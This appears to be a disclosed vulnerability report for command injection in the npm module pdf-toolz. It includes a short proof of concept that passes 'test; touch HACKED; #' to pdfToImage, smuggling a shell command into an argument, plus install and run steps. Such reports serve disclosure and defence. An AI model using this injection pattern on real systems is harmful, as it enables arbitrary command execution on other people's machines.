Code Injection in rapidfacture/pdf-toolz


Reported on

Apr 19th 2020


The pdf-toolz module is vulnerable against arbitrary command injection due to the fact some inputs given by the user are unsafely processed and executed.


  1. Create the following PoC file:
// poc.js
var pdf = require('pdf-toolz/PDF2Image');
pdf.pdfToImage("a", "test; touch HACKED; #");

  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
apt-get install graphicsmagick # Install the *gm* executable needed for the module
npm i pdf-toolz # Install affected module
node poc.js #  Run the PoC
  1. Recheck the files: now HACKED has been created
to join this conversation